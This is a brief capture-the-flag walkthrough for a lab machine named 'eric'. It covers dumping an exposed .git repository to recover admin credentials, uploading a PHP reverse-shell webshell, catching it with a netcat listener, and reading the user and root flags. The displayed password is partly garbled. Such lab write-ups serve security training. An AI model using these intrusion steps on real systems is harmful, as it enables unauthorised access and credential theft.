Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve SP: eric machine.
Eric is trying to reach out on the Internet, but is he following best practice?
Flags – /root/flag.txt – /home/eric/flag.txt
Tested with VirtualBox
Should not be as easy as to just run a MSF module to get root right away, if so please let me know.
Doesn’t always get an IP address nicely with DHCP.
After testing the admin page I did understand that .git was the right way for getting some juicy info.
For our purpose, we are gonna use gittools
- git clone https://github.com/internetwache/GitTools
- cd GitTools
- chmod +x gitdumper.sh
- ./gitdumper.sh http://192.168.1.152/.git/ dest-dir
- ./extractor.sh dest-dir/ dest-dir/
- cd 2-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
- examinate the admin.php file and bingo we found the password
- USERNAME: admin
- PASSWORD: firstname.lastname@example.orgRu$glo0mappL3
After logging in, we can upload a webshell
- copy a web shell into local diretory: cp /usr/share/webshells/php/php-reverse-shell.php .
- modify the ip
- nc -nlvp 443
- upload the file
- Bingo we have a revshell
- cd /home/eric
- cat flag.txt
- nano backup.sh
- cat /root/flag.txt
Fantastic we have completed the eric machine.